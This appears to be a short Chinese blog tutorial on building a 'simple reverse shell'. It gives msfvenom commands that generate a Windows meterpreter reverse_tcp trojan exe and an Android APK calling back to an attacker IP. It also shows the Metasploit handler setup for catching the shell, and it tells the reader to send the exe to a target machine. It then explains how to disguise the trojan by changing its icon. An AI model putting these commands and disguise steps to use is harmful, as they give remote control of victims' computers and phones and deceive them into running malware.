简单的反弹shell

0x01

msf生成木马exe,靶机打开中招。

1、msf生成木马exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.142.132 LPORT=1234 -f exe -o shell.exe

发送到目标机器。

扩展:msf可以生成很多木马,手机的也可以。比如安卓的

msfvenom -p android/meterpreter/reverse_tcp LHOST=X LPORT=X > aaa.apk  ,接下来的就都一样了

2、打开msf控制台

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

设置变量跟生成木马的 IP 和 端口一致。

简单的反弹shell_第1张图片
payload

3、run或者exploit

4、靶机上打开shell.exe,即可接收到shell

简单的反弹shell_第2张图片

拿到shell后,可能有乱码。  输入 chcp 65001  可以解决。

简单的反弹shell_第3张图片

今天2019/26,今天找到了更换exe文件图标的办法,需要两个工具 IrfanView(1)将图片转换成ICO文件的工具。(2)将exe图标更换的工具 qiconchanger。主要还是qiconchanger工具。ICO文件从网上找或者从应用文档里找,或者用IrfanView 这个软件做一个。

简单的反弹shell_第4张图片

直接把木马exe拖到这个框框里,再把ICO文件拖过来就行了。但是需要exe和ICO在一个文档里才能显示出想要的效果。

呐!!下面是我做的


0x02

nc

参考网站:https://www.jianshu.com/p/c1ffb563db4e

你可能感兴趣的:(简单的反弹shell)